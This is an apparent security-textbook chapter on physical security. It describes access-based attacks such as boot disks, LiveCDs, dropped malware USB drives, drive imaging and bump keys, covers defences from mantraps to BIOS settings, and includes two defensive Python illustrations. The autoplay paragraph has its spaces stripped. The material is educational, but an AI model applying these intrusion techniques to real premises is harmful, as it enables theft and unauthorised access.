Consider that most network security measures are, from necessity, directed at protecting a company from Internet-based threats. Consequently, a lot of companies allow any kind of traffic on the local area network (LAN). So if an attacker attempts to gain access to a server over the Internet and fails, he may be able to gain physical access to the receptionist's machine and, by quickly compromising it, use it as a remotely controlled zombie to attack what he is really after. Figure 8.1 illustrates the use of a lower-privilege machine to obtain sensitive information. Physically securing information assets doesn't mean just the servers; it means protecting physical access to all the organization's computers and its entire network infrastructure.
• Figure 8.1 Using a lower-privilege machine to get at sensitive information
Physical access to a corporation's systems can allow an attacker to perform a number of interesting activities, starting with simply plugging into an open Ethernet jack. The advent of handheld devices with the ability to run operating systems with full networking support has made this attack scenario even more feasible. Prior to handheld devices, the attacker would have to work in a secluded area with dedicated access to the Ethernet for a time. The attacker would sit down with a laptop and run a variety of tools against the network, and working internally typically put the attacker inside the firewall and IDS. Today's capable mobile devices can assist these efforts by allowing attackers to place the small device onto the network to act as a wireless bridge, as shown in Figure 8.2.
• Figure 8.2 A wireless bridge can allow remote access.
The attacker can then use a laptop to attack a network remotely via the bridge from outside the building. If power is available near the Ethernet jack, this type of attack can also be accomplished with an off-the-shelf access point. The attacker's only challenge is finding an Ethernet jack that isn't covered by furniture or some other obstruction.
Another simple attack that can be used when an attacker has physical access is called a boot disk. Any media used to boot a computer into an operating system that is not the native OS on its hard drive could be classified as a boot disk. These can be in the form of a floppy disk, CD, DVD, or a USB flash drive. Before bootable CDs or DVDs were available, a boot floppy was used to start the system and prepare the hard drives to load the operating system. A boot source can contain a number of programs, but the most typical ones would be NTFSDOS or a floppy-based Linux distribution that can be used to perform a number of tasks, including mounting the hard drives and performing at least read operations, all done via script. Once an attacker is able to read a hard drive, the password file can be copied off the machine for offline password-cracking attacks. If write access to the drive is obtained, the attacker could alter the password file or place a remote-control program to be executed automatically upon the next boot, guaranteeing continued access to the machine. Most new machines do not include floppy drives, so this attack is rapidly being replaced by the same concept with a USB device, CD, or DVD. The most obvious mitigation is to tell the BIOS not to boot from removable media, but this too has issues.
The bootable CD-ROMs and DVD-ROMs are actually more of a threat, because they are frequently used to carry a variety of software for updates and can utilize the much greater storage capacity of the CD or DVD media. This capacity can store an entire operating system and a complete toolset for a variety of tasks or malware, so when updating via CD/DVD, precautions must be taken to ensure the veracity of the media.
There are operating system distributions specifically designed to run the entire machine from an optical disc without using the hard drive. These are commonly referred to as LiveCDs. A LiveCD contains a bootable version of an entire operating system, typically a variant of Linux, complete with drivers for most devices. LiveCDs give an attacker a greater array of tools than could be loaded onto a floppy disk, such as scanners, sniffers, vulnerability exploits, forensic tools, drive imagers, password crackers, and so on. These sets of tools are too numerous to list here and are changing every day. The best resource is to search the Internet for popular LiveCD distributions like Kali/Backtrack, Knoppix, and PHLAK. A sample collection of LiveCDs is shown in Figure 8.3.
• Figure 8.3 A collection of sample LiveCDs
For example, with a LiveCD an attacker would likely have access to the hard disk and also to an operational network interface that would allow him to send the drive data over the Internet if properly connected. These bootable operating systems could also be custom built to contain any tool that runs under Linux, allowing an attacker to build a standard bootable attack image or a standard bootable forensic image, or something customized for the tools he likes to use.
Bootable USB flash drives emulate the function of a CD-ROM and provide a device that is both physically smaller and logically larger. Cheap USB flash drives are now commonly available that provide greater than 32 GB of storage, with more expensive versions stretching that capacity to 64, 128, and even 256 GB. Electronic miniaturization has made these devices small enough to be unnoticed; a recent version extends only 5 mm from the USB port. Made bootable, these devices can contain entire specialized operating systems, and unlike a bootable CD-ROM, these devices can also be written to, providing an offload point for collected data if an attacker chooses to leave the device and return later.
Try This!
Create a Boot Disk
Boot disks allow you to boot a computer to the disk rather than the OS that is on the hard drive. Create a boot disk for your own personal computer. The steps differ between different OSs and depend upon the media that you wish to make bootable. Perform a little research to determine the correct procedure for your OS and give it a try. Make a bootable CD/DVD or USB flash drive.
These types of devices have spawned a new kind of attack in which a CD, DVD, or flash drive is left in an opportunistic place where members of a target organization may pick up and use them. This CD/DVD or flash drive is typically loaded with malware and is referred to as a road apple. The attack relies on curious people to plug the device into their work computer to see what's on it. Occasionally the attacker may also try to tempt the passerby with enticing descriptions like "Employee Salaries" or even something as simple as "Confidential." Once a user loads the CD/DVD or flash drive, the malware will attempt to infect the machine.
Drive imaging is the process of copying the entire contents of a hard drive to a single file on a different media. This process is often used by people who perform forensic investigations of computers. Typically, a bootable media is used to start the computer and load the drive imaging software. This software is designed to make a bit-by-bit copy of the hard drive in a file on another media, usually another hard drive or CD-R/DVD-R media. Drive imaging is used in investigations to make an exact copy that can be observed and taken apart, while keeping the original exactly as it was for evidence purposes.
Exam Tip: Drive imaging is a threat because all existing access controls to data can be bypassed and all the data stored on the drive can be read from the image.
From an attacker's perspective, drive imaging software is useful because it pulls all information from a computer's hard drive while still leaving the machine in its original state. The information contains every bit of data that is on the computer: any locally stored documents, locally stored e-mails, and every other piece of information that the hard drive contains. This data could be very valuable if the machine holds sensitive information about the company.
Physical access is the most common way of imaging a drive, and the biggest benefit for the attacker is that drive imaging leaves absolutely no trace of the crime. Besides physically securing access to your computers, you can do very little to prevent drive imaging, but you can minimize its impact. The use of encryption even for a few important files provides protection. Full encryption of the drive protects all files stored on it. Alternatively, placing files on a centralized file server keeps them from being imaged from an individual machine, but if an attacker is able to image the file server, the data will be copied.
Cross Check
Forensic Images
When taking a forensic-based image, it is important to follow proper forensic procedures to ensure the evidence is properly secured. Forensic processes and procedures are covered in detail in Chapter 23.
Tech Tip
Encryption to TPM-Based Keys
Many computers now come with a security chip that follows the Trusted Platform Module standard. This TPM chip allows for the creation and storage of encryption keys. One of the strengths associated with this level of security is that if a copy of a drive, or even the drive itself, is stolen, the contents are unusable without the key. Having this key locked in hardware prevents hackers from stealing a copy of the key from a memory location.
A denial-of-service (DoS) attack can also be performed with physical access. Physical access to the computers can be much more effective than a network-based DoS attack. Stealing a computer, using a boot disk to erase all data on the drives, or simply unplugging computers are all effective DoS attacks. Depending on the company's quality and frequency of backing up critical systems, a DoS attack using these methods can have lasting effects.
Physical access can negate almost all the security that the network attempts to provide. Considering this, you must determine the level of physical access that attackers might obtain. Of special consideration are persons with authorized access to the building but who are not authorized users of the systems. Janitorial personnel and others have authorized access to many areas, but they do not have authorized system access. An attacker could pose as one of these individuals or attempt to gain access to the facilities through them.
Physical Security Safeguards
While it is difficult, if not impossible, to make an organization's computer systems totally secure, many steps can be taken to mitigate the risk to information systems from a physical threat. The following sections discuss access control methods and physical security policies and procedures that should be implemented.
Walls and Guards
The primary defense against a majority of physical attacks is the barriers between the assets and a potential attacker—walls, fences, gates, and doors. Some organizations also employ full- or part-time private security staff to attempt to protect their assets. These barriers provide the foundation upon which all other security initiatives are based, but the security must be designed carefully, as an attacker has to find only a single gap to gain access.
Exam Tip: All entry points to server rooms and wiring closets should be closely controlled, and, if possible, access should be logged through an access control system.
Walls may have been one of the first inventions of man. Once he learned to use natural obstacles such as mountains to separate him from his enemy, he next learned to build his own mountain for the same purpose. Hadrian's Wall in England, the Great Wall of China, and the Berlin Wall are all famous examples of such basic physical defenses. The walls of any building serve the same purpose, but on a smaller scale: they provide barriers to physical access to company assets. Bollards are small and round concrete pillars that are constructed and placed around a building to protect it from being damaged by someone driving a vehicle into the side of the building, or getting close and using a car bomb.
To protect the physical servers, you must look in all directions: Doors and windows should be safeguarded and a minimum number of each should be used in a server room. Less obvious entry points should also be considered: Is a drop ceiling used in the server room? Do the interior walls extend to the actual roof, raised floors, or crawl spaces? Access to the server room should be limited to the people who need access, not to all employees of the organization. If you are going to use a wall to protect an asset, make sure no obvious holes appear in that wall.
Another method of preventing surreptitious access is through the use of windows. Many high-security areas have a significant number of windows so that people's activities within the area can't be hidden. A closed server room with no windows makes for a quiet place for someone to achieve physical access to a device without worry of being seen. Windows remove this privacy element that many criminals depend upon to achieve their entry and illicit activities. Too many windows make it easy to shoulder surf—balance is the key,
Fences
Outside of the building's walls, many organizations prefer to have a perimeter fence as a physical first layer of defense. Chain-link-type fencing is most commonly used, and it can be enhanced with barbed wire. Anti-scale fencing, which looks like very tall vertical poles placed close together to form a fence, is used for high-security implementations that require additional scale and tamper resistance.
To increase security against physical intrusion, higher fences can be employed. A fence that is three to four feet in height will deter casual or accidental trespassers. Six to seven feet will deter a general intruder. To deter more determined intruders, a minimum height of eight feet is recommended with the addition of barbed wire or razor wire on top for extreme levels of deterrence.
Guards
Guards provide an excellent security measure, because guards are a visible presence with direct responsibility for security. Other employees expect security guards to behave a certain way with regard to securing the facility. Guards typically monitor entrances and exits and can maintain access logs of who has entered and departed the building. In many organizations, everyone who passes through security as a visitor must sign the log, which can be useful in tracing who was at what location and why.
The bigger challenge associated with capturing surveillance activities or other attempted break-in efforts is their clandestine nature. These efforts are designed to be as low profile and nonobvious as possible to increase the chances of success. Training and awareness are necessary not just for security personnel but for all personnel. If an employee hears multiple extensions all start ringing in the middle of the night, do they know who to notify? If a security guard notes such activity, how does this information get reported to the correct team?
Security personnel are helpful in physically securing the machines on which information assets reside, but to get the most benefit from their presence, they must be trained to take a holistic approach to security. The value of data typically can be many times that of the machines on which the data is stored. Security guards typically are not computer security experts, so they need to be educated about the value of the data and be trained in network security as well as physical security involving users. They are the company's eyes and ears for suspicious activity, so the network security department needs to train them to notice suspicious network activity as well. Multiple extensions ringing in sequence during the night, computers rebooting all at once, or strange people parked in the parking lot with laptop computers are all indicators of a network attack that might be missed without proper training.
Many traditional physical security tools such as access controls and CCTV camera systems are transitioning from closed hardwired systems to Ethernet- and IP-based systems. This transition opens up the devices to network attacks traditionally performed on computers. With physical security systems being implemented using the IP network, everyone in physical security must become smarter about network security.
Physical Access Controls and Monitoring
Physical access control means control of doors and entry points. The design and construction of all types of access control systems, as well as the physical barriers to which they are most complementary, are fully discussed in other texts. Here, we explore a few important points to help you safeguard the information infrastructure, especially where it meets with the physical access control system. This section talks about physical locks, layered access systems, and electronic access control systems. It also discusses closed circuit television (CCTV) systems and the implications of different CCTV system types.
Locks
Locks have been discussed as a primary element of security. Although locks have been used for hundreds of years, their design has not changed much: a metal "token" is used to align pins in a mechanical device. As all mechanical devices have tolerances, it is possible to sneak through these tolerances by "picking" the lock. Most locks can be easily picked with simple tools, some of which are shown in Figure 8.4.
• Figure 8.4 Lock picking tools
As we humans are always trying to build a better mousetrap, high-security locks have been designed to defeat attacks, such as the one shown in Figure 8.5; these locks are more sophisticated than a standard home deadbolt system. Typically found in commercial applications that require high security, these locks are made to resist picking and drilling, as well as other common attacks such as simply pounding the lock through the door. Another common feature of high-security locks is key control, which refers to the restrictions placed on making a copy of the key. For most residential locks, a trip to the hardware store will allow you to make a copy of the key. Key control locks use patented keyways that can only be copied at a locksmith, who will keep records on authorized users of a particular key.
• Figure 8.5 A high-security lock and its key
High-end lock security is more important now that attacks such as "bump keys" are well known and widely available. A bump key is a key cut with all notches to the maximum depth, also known as "all nines." This key uses a technique that has been around a long time, but has recently gained a lot of popularity. The key is inserted into the lock and then sharply struck, bouncing the lock pins up above the shear line and allowing the lock to open. High-security locks attempt to prevent this type of attack through various mechanical means such as nontraditional pin layout, sidebars, and even magnetic keys.
Other physical locks include programmable or cipher locks; locks with a keypad that require a combination of keys to open the lock; and locks with a reader that require an access card to open the lock. These may have special options such as a hostage alarm (support a key combination to trigger an alarm). Master-keying (support key combinations to change the access code and configure the functions of the lock) and key-override functions (support key combinations to override the usual procedures) are also options on high-end programmable locks.
Exam Tip: Layered access is a form of defense in depth, a principal component of any strong security solution.
Device locks are used to lock a device to a physical restraint, preventing its removal. Another method of securing laptops and mobile devices is a cable trap, which allows a user to affix a cable lock to a secure structure.
Layered Access
Layered access is an important concept in security. It is often mentioned in conversations about network security perimeters, but in this chapter it relates to the concept of physical security perimeters. To help prevent an attacker from gaining access to important assets, these assets should be placed inside multiple perimeters. Servers should be placed in a separate secure area, ideally with a separate authentication mechanism. For example, if an organization has an electronic door control system using contactless access cards (such as the example shown in Figure 8.6) as well as a keypad, a combination of the card and a separate PIN code would be required to open the door to the server room.
• Figure 8.6 Contactless access cards act as modern keys to a building.
Access to the server room should be limited to staff with a legitimate need to work on the servers. To layer the protection, the area surrounding the server room should also be limited to people who need to work in that area.
Electronic Access Control Systems
Many organizations use electronic access control systems to control the opening of doors. The use of proximity readers and contactless access cards provides user information to the control panel. Doorways are electronically controlled via electronic door strikes and magnetic locks. These devices rely on an electronic signal from the control panel to release the mechanism that keeps the door closed. These devices are integrated into an access control system that controls and logs entry into all the doors connected to it, typically through the use of access tokens. Security is improved by having a centralized system that can instantly grant or refuse access based upon access lists and the reading of a token that is given to the user. This kind of system also logs user access, providing nonrepudiation of a specific user's presence in a controlled environment. The system will allow logging of personnel entry, auditing of personnel movements, and real-time monitoring of the access controls.
Exam Tip: A mantrap door arrangement can prevent unauthorized people from following authorized users through an access-controlled door, which is also known as "tailgating."
One caution about these kinds of systems is that they usually work with a software package that runs on a computer, and as such this computer should not be attached to the company network. While attaching it to the network can allow easy administration, the last thing you want is for an attacker to have control of the system that allows physical access to your facility. With this control, an attacker could input the ID of a badge that she owns, allowing full, legitimate access to an area the system controls.
Another problem with such a system is that it logs only the person who initially used the card to open the door—so no logs exist for doors that are propped open to allow others access, or of people "tailgating" through a door opened with a card. The implementation of a mantrap is one way to combat tailgating. A mantrap comprises two doors closely spaced that require the user to card through one and then the other sequentially. Mantraps make it nearly impossible to trail through a doorway undetected—if you happen to catch the first door, you will be trapped in by the second door.
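The interlock that makes a mantrap work can be stated precisely as a small state machine. The Python program below is an added illustration written for this chapter; it is not code from the book or from any access control product. The door and event names, the badge identifiers, and the event sequence are all constructed for the example. It models the two rules the text describes: the inner door releases only for the badge that came through the outer door, and only after the outer door has closed; the outer door stays locked while someone is in the vestibule, which is the window in which a tailgater would otherwise slip through. Occupancy sensing (detecting two bodies between the doors) is not modeled.

```python
"""Mantrap interlock controller (added illustration, not the book's code).

Two doors, "outer" and "inner", form a vestibule. A badge must be presented
at the outer reader, the outer door must close, and then the same badge must
be presented at the inner reader. Everything here is a constructed model.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple


@dataclass
class Mantrap:
    authorized: Set[str]                      # badges allowed through
    occupant: Optional[str] = None            # badge currently in the vestibule
    outer_open: bool = False
    inner_open: bool = False
    log: List[Tuple[str, str, Optional[str]]] = field(default_factory=list)

    def badge(self, door: str, badge_id: str) -> bool:
        """Present `badge_id` at `door`; return True if the lock releases."""
        if badge_id not in self.authorized:
            self.log.append(("denied", door, badge_id))
            return False
        if door == "outer":
            # Interlock: the outer door stays locked while the inner door is
            # open or while someone is still inside the vestibule.
            if self.inner_open or self.occupant is not None:
                self.log.append(("interlock", door, badge_id))
                return False
            self.occupant = badge_id
            self.outer_open = True
            self.log.append(("open", door, badge_id))
            return True
        if door == "inner":
            # Only the badge that entered, and only once the outer door closed,
            # so a second person cannot be let in behind the first.
            if self.outer_open or self.occupant != badge_id:
                self.log.append(("interlock", door, badge_id))
                return False
            self.inner_open = True
            self.log.append(("open", door, badge_id))
            return True
        raise ValueError("unknown door: %s" % door)

    def close(self, door: str) -> None:
        """Door-closed sensor event; closing the inner door empties the vestibule."""
        if door == "outer":
            self.outer_open = False
        elif door == "inner":
            self.inner_open = False
            self.occupant = None
        self.log.append(("closed", door, None))


def run_sample() -> List[bool]:
    """Constructed scenario: Alice passes through normally; Bob tries the outer
    door while Alice is still in the vestibule and is held out until she has
    gone through the inner door and it has closed behind her."""
    trap = Mantrap(authorized={"alice", "bob"})
    results = []
    results.append(trap.badge("outer", "alice"))   # releases
    results.append(trap.badge("inner", "alice"))   # refused: outer still open
    trap.close("outer")
    results.append(trap.badge("outer", "bob"))     # refused: Alice inside
    results.append(trap.badge("inner", "alice"))   # releases
    trap.close("inner")
    results.append(trap.badge("outer", "bob"))     # releases: vestibule empty
    return results


if __name__ == "__main__":
    print(run_sample())
```

Every refusal is written to the controller's log as an "interlock" event, so a string of interlock refusals at one vestibule is itself worth reviewing: it is the trace that a plain card reader, which logs only the first badge, never produces.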
Doors
Doors to secured areas should have characteristics to make them less obvious. They should have similar appearance to the other doors to avoid catching the attention of intruders. Security doors should be self-closing and have no hold-open feature. They should trigger alarms if they are forcibly opened or have been held open for a long period.
Exam Tip: A fail-soft (or fail-safe) lock is unlocked in a power interruption. A fail-secure lock is locked in a power interruption.
Door systems, like many systems, have two design methodologies: fail-safe or fail-secure. While fail-safe is a common enough phrase to have entered the lexicon, think about what it really means—being safe when a system fails. In the case of these electronic door systems, fail-safe means that the door is unlocked should power fail. To fail-secure means that the system will lock the door when power is lost. This can also apply when door systems are manually bypassed. It is important to know how each door will react to a system failure, not only for security but also for fire code compliance, as fail-secure is not allowed for certain doors in a building.
Cameras
Closed circuit television (CCTV) cameras are similar to the door control systems—they can be very effective, but how they are implemented is an important consideration. The use of CCTV cameras for surveillance purposes dates back to at least 1961, when cameras were installed in the London Transport train station. The development of smaller and more sophisticated camera components and decreasing prices for the cameras have caused a boom in the CCTV industry since then. CCTV cameras are used to monitor a workplace for security purposes.
These systems are commonplace in banks and jewelry stores, places with high-value merchandise that is attractive to thieves. As the expense of these systems dropped, they became practical for many more industry segments. Traditional cameras are analog based and require a video multiplexer to combine all the signals and make multiple views appear on a monitor. IP-based cameras are changing that, as most of them are standalone units viewable through a web browser, such as the camera shown in Figure 8.7.
• Figure 8.7 IP-based cameras leverage existing IP networks instead of needing a proprietary CCTV cable.
Tech Tip
PTZ Cameras
Pan-tilt-zoom (PTZ) cameras are cameras that have the functionality to enable camera movement in multiple axes, as well as the ability to zoom in on an item. These cameras provide additional capability, especially in situations where the video is monitored and the monitoring station can maneuver the camera.
These IP-based systems add useful functionality, such as the ability to check on the building from the Internet. This network functionality, however, makes the cameras subject to normal IP-based network attacks. A DoS attack launched at the CCTV system just as a break-in is occurring is the last thing that anyone would want (other than the criminals). For this reason, IP-based CCTV cameras should be placed on their own separate network that can be accessed only by security personnel. The same physical separation applies to any IP-based camera infrastructure. Older time-lapse tape recorders are slowly being replaced with digital video recorders. While the advance in technology is significant, be careful if and when these devices become IP-enabled, since they will become a security issue, just like everything else that touches the network.
If you depend on the CCTV system to protect your organization's assets, carefully consider camera placement and the type of cameras used. Different iris types, focal lengths, and color or infrared capabilities are all options that make one camera superior to another in a specific location.
Alarms
There are several types of alarm systems. Local alarm systems ring only locally. A central station system is one where alarms (and CCTV) are monitored by a central station. Many alarms will have auxiliary or secondary reporting functions to local police or fire departments. Alarms work by alerting personnel to the triggering of specific monitoring controls. Typical controls include the following:
Dry contact switches use metallic foil tape as a contact detector to detect whether a door or window is opened.
Electro-mechanical detection systems detect a change or break in a circuit. They can be used as a contact detector to detect whether a door or window is opened.
Vibration detection systems detect movement on walls, ceilings, floors, and so forth by vibration.
Pressure mats detect whether someone is stepping on the mat.
Photoelectric or photometric detection systems emit a beam of light and monitor the beam to detect motion and break-in.
Wave pattern motion detectors generate microwave or ultrasonic waves and monitor the emitted waves to detect motion.
Passive infrared detection systems detect changes of heat waves generated by an intruder.
Audio or acoustical-seismic detection systems listen for changes in noise levels.
Proximity detectors or capacitance detectors emit a magnetic field and monitor the field to detect any interruption.
Convergence
There is a trend to converge elements of physical and information security to improve identification of unauthorized activity on networks. If an access control system is asked to approve access to an insider using an outside address, yet the physical security system identifies them as being in the building, then an anomaly exists and should be investigated. This trend is called convergence and can significantly improve defenses against cloned credentials.
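The anomaly just described can be found mechanically by joining the badge system's entry/exit log against the remote-access log. The Python program below is an added illustration written for this chapter, not code from the book or from any badge or VPN product. Both log formats, the user names, the timestamps, and the IP addresses are constructed samples; the internal address ranges are the RFC 1918 private blocks. The check reconstructs, for each remote login, whether that user's most recent badge event before the login was an entry, and flags logins from non-internal addresses by users who were badged in at the time.

```python
"""Convergence check: badge log joined with remote-login log (added illustration).

A user whose last badge event is IN is physically in the building; a remote
login for that user from an outside address at that moment is the anomaly the
chapter describes. Log formats and contents below are constructed.
"""
from datetime import datetime
import ipaddress

# Constructed badge log: timestamp, user, direction (IN/OUT), door.
BADGE_LOG = """\
2016-03-01T08:02:11 alice IN  main-lobby
2016-03-01T08:05:40 bob   IN  main-lobby
2016-03-01T12:30:05 bob   OUT main-lobby
2016-03-01T17:01:00 alice OUT main-lobby
"""

# Constructed remote-access log: timestamp, user, source address.
VPN_LOG = """\
2016-03-01T09:15:22 alice 203.0.113.45
2016-03-01T13:10:09 bob   198.51.100.7
2016-03-01T18:20:00 alice 203.0.113.45
2016-03-01T10:00:00 carol 10.20.30.40
"""

# Address blocks treated as inside the building's network (RFC 1918).
INTERNAL_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def parse_badge(text):
    """Return {user: [(timestamp, direction), ...]} sorted by time."""
    events = {}
    for line in text.splitlines():
        ts, user, direction, _door = line.split()
        events.setdefault(user, []).append((datetime.fromisoformat(ts), direction))
    for entries in events.values():
        entries.sort()
    return events


def in_building(events, user, when):
    """True if the user's last badge event at or before `when` was an entry."""
    state = False
    for ts, direction in events.get(user, []):
        if ts > when:
            break
        state = direction == "IN"
    return state


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def find_anomalies(badge_text, vpn_text):
    """Return (user, timestamp, address) for outside logins by badged-in users."""
    events = parse_badge(badge_text)
    hits = []
    for line in vpn_text.splitlines():
        ts, user, addr = line.split()
        when = datetime.fromisoformat(ts)
        if not is_internal(addr) and in_building(events, user, when):
            hits.append((user, ts, addr))
    return hits


if __name__ == "__main__":
    for user, ts, addr in find_anomalies(BADGE_LOG, VPN_LOG):
        print("ANOMALY: %s badged in but logged in remotely from %s at %s" % (user, addr, ts))
```

In the sample, Alice's 09:15 login from an outside address is flagged because she badged in at 08:02 and had not badged out; Bob's 13:10 login is not, because he badged out at 12:30. A real deployment would read both logs from their sources and run on a schedule, but the join logic is the same.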
Policies and Procedures
A policy's effectiveness depends on the culture of an organization, so all of the policies mentioned here should be followed up by functional procedures that are designed to implement them. Physical security policies and procedures relate to two distinct areas: those that affect the computers themselves and those that affect users.
To mitigate the risk to computers, physical security needs to be extended to the computers themselves. To combat the threat of boot disks, begin by removing or disabling the ability of a system to automatically play connected devices, such as USB flash drives. Other activities that typically require physical presence should be protected, such as access to a system's BIOS at bootup.
Try This!
Exploring Your BIOS Settings
Next time you boot your PC, explore the BIOS settings. Usually, pressing the F2 key immediately on power-up will allow you to enter the BIOS setup screens. Most PCs will also have a brief time when they prompt for "Setup" and give a key to press, most commonly F2 or F12. Explore elements such as the boot order for devices, options for adding passwords, and other options. For safety, do not save changes unless you are absolutely certain that you want to make those changes and are aware of the consequences. To prevent an attacker from editing the boot order, you should set BIOS passwords.
BIOS
A safeguard that can be employed is the removal of removable media devices from the boot sequence in the computer's BIOS (basic input/output system). The specifics of this operation depend on the BIOS software of the individual machine. A related step that must be taken is to set a BIOS password. Nearly all BIOS software will support password protection that allows you to boot the machine but requires a password to edit any BIOS settings. While disabling the optical drive and setting a BIOS password are both good measures, do not depend on this strategy exclusively because, in some cases, BIOS manufacturers will have a default BIOS password that still works.
Depending upon BIOS passwords is also not a guaranteed security measure. For many machines, it is trivial to remove and then replace the BIOS battery, which will reset the BIOS to the "no password" or default password state.
UEFI
Unified Extensible Firmware Interface (UEFI) is a standard firmware interface for PCs, designed to replace BIOS. Supported by Mac OS X, Linux (later versions), and Windows 8 and beyond, UEFI offers some significant security advantages. UEFI has a functionality known as secure boot, which allows only digitally signed drivers and OS loaders to be used during the boot process, preventing bootkit attacks. As UEFI is replacing BIOS, and has additional characteristics, it is important to keep policies and procedures current with the advancement of technology.
Exam Tip: USB devices can be used to inject malicious code onto any machine to which they are attached. They can be used to transport malicious code from machine to machine without using the network.
USB
USB ports have greatly expanded users' ability to connect devices to their computers. USB ports automatically recognize a device being plugged into the system and usually work without the user needing to add drivers or configure software. This has spawned a legion of USB devices, from MP3 players to CD burners.
The most interesting of these, for security purposes, are the USB flash memory–based storage devices. USB drive keys, which are basically flash memory with a USB interface in a device typically about the size of your thumb, provide a way to move files easily from computer to computer. When plugged into a USB port, these devices automount and behave like any other drive attached to the computer. Their small size and relatively large capacity, coupled with instant read-write ability, present security problems. They can easily be used by an individual with malicious intent to conceal the removal of files or data from the building or to bring malicious files into the building and onto the company network.
Laptops and tablets are popular targets for thieves and should be locked inside a desk when not in use, or secured with special computer lockdown cables. If desktop towers are used, use computer desks that provide a space in which to lock the computer. All of these measures can improve the physical security of the computers themselves, but most of them can be defeated by attackers if users are not knowledgeable about the security program and do not follow it.
In addition, well-intentioned users could accidentally introduce malicious code from USB devices by using them on an infected home machine and then bringing the infected device to the office, allowing the malware to bypass perimeter protections and possibly infect the organization. If USB devices are allowed, aggressive virus scanning should be implemented throughout the organization. The devices can be disallowed via Active Directory policy settings or with a Windows Registry key entry. USB can also be completely disabled, either through BIOS settings or by unloading and disabling the USB drivers from users' machines, either of which will stop all USB devices from working—however, doing this can create more trouble if users have USB keyboards and mice. There are two common ways to disable USB support in a Windows system. On older systems, editing the Registry key is probably the most effective solution for users who are not authorized to use these devices. On newer systems, the best way is through Group Policy in a domain or through the Local Security Policy MMC on a stand-alone box.
AutoplayAnotherbootdevicetoconsideristheCD/DVDdrive.Thisdevicecanprobablyalsoberemovedfromordisabledonanumberofmachines.ADVDnotonlycanbeusedasabootdevice,butalsocanbeexploitedvia
theautoplayfeaturethatsomeoperatingsystemssupport.Autoplaywasdesignedasaconvenienceforusers,sothatwhenaCD/DVDorUSBcontaininganapplicationisinserted,thecomputerinstantlypromptsforinputversusrequiringtheusertoexplorethedevicefilesystemandfindtheexecutablefile.Unfortunately,sincetheautoplayfunctionalityrunsanexecutable,itcanbeprogrammedtodoanythinganattackerwants.Ifanautoplayexecutableismalicious,itcouldallowanattackertogainremotecontrolofthemachine.Figure8.8illustratesanautoplaymessagepromptinWindows,givingauseratleastminimalcontroloverwhethertorunanitemornot.
Figure 8.8 Autoplay on a Windows system
Since the optical drive can be used as a boot device, a DVD loaded with its own operating system (called a LiveCD, introduced earlier in the chapter) could be used to boot the computer with malicious system code (see Figure 8.9). This separate operating system will bypass any passwords on the host machine and can access locally stored files. The control that actually protects the data against a boot-disk attack is full-disk encryption: the LiveCD can still read the disk, but without the key it sees only ciphertext.
Figure 8.9 A LiveCD boots its own OS and bypasses any built-in security of the native operating system.
Tech Tip
Disabling the Autoplay Feature in Windows
Disabling the autoplay feature is an easy task using the Local Group Policy Editor in Windows. Simply launch the Local Group Policy Editor (gpedit.msc) and navigate to this location:
Computer Configuration > Administrative Templates > Windows Components > AutoPlay Policies
Enable the "Turn off AutoPlay" policy there and select all drives.
Device Theft
The outright theft of a computer is a simple physical attack. This attack can be mitigated in a number of ways, but the most effective method is to lock up equipment that contains important data. Insurance can cover the loss of the physical equipment, but this can do little to get a business up and running again quickly after a theft. Therefore, implementing special access controls for server rooms and simply locking the rack cabinets when maintenance is not being performed are good ways to secure an area. From a data standpoint, mission-critical or high-value information should be stored on a server only. This can mitigate the risk of a desktop or laptop being stolen for the data it contains. Loss of laptops has been a common cause of information breaches.
Mobile device thefts from cars and other locations can occur in seconds. Thieves have been caught taking mobile devices from security screening areas at airports while the owner was distracted in screening. Snatch-and-grab attacks occur in restaurants, bars, and cafes. Tablets and smartphones have significant value, and physical precautions should be taken at all times.
Cross Check
Mobile Device Security
Mobile device security is covered in depth in Chapter 14. For a more detailed analysis of safeguards unique to mobile devices, please refer to that section of the text.
Users can perform one of the simplest, yet most important, information security tasks: lock a workstation immediately before they step away from it.
Although use of a self-locking screen saver is a good policy, setting it to lock at any point less than 10 to 15 minutes after becoming idle is often considered a nuisance and counterproductive to active use of the computer on the job, as the computer will often lock while the employee is still actively using it. Thus, computers typically sit idle for at least 15 minutes before automatically locking under this type of policy. Users should manually lock their workstations, as an attacker only needs to be lucky enough to catch a machine that has been left alone for 5 minutes.
BTU stands for British Thermal Unit; a single BTU is defined as the amount of energy required to raise the temperature of one pound of liquid water one degree Fahrenheit.
Environmental Controls
While the confidentiality of information is important, so is its availability. Sophisticated environmental controls are needed for current data centers. Servers can generate large amounts of heat, and managing the heat is the job of the environmental control. Controlling a data center's temperature and humidity is important to keeping servers running. Heating, ventilating, and air conditioning (HVAC) systems are critical for keeping data centers cool, because typical servers put out between 1000 and 2000 BTUs of heat per hour. The temperature of a data center should be maintained between 70 and 74 degrees Fahrenheit (°F). If the temperature is too low, it may cause mechanisms to slow down. If the temperature is too high, it may cause equipment damage. The temperature-damaging points of different products are as follows:
Magnetic media: 100°F
Computer hardware: 175°F
Paper products: 350°F
It should be noted that these are temperatures of the materials; the surrounding air is frequently cooler. Temperature measurements should be obtained on the equipment itself to ensure appropriate protection. Multiple servers in a confined area can create conditions too hot for the machines to continue to operate. This problem is made worse with the advent of blade-style computing systems and with many other devices shrinking in size. While physically smaller, they tend to still expel the same amount of heat. This is known as increased data center density: more servers and devices per rack, putting a greater load on the cooling systems. This encourages the use of a hot aisle/cold aisle layout. A data center that is arranged into hot and cold aisles dictates that all the intake fans on all equipment face the cold aisle, and the exhaust fans all face the opposite aisle. The HVAC system is then designed to push cool air underneath the raised floor and up through perforated tiles on the cold aisle. Hot air from the hot aisle is captured by return air ducts for the HVAC system. The use of this layout is designed to control airflow, with the purpose being never to mix the hot and cold air. This requires the use of blocking plates and side plates to close open rack slots. The benefits of this arrangement are that cooling is more efficient and can handle higher density. The failure of HVAC systems for any reason is cause for concern. Rising copper prices have made HVAC systems targets for thieves, and general vandalism can result in costly downtime. Properly securing these systems is important in helping prevent an attacker from performing a physical DoS attack on your servers.
Fire Suppression
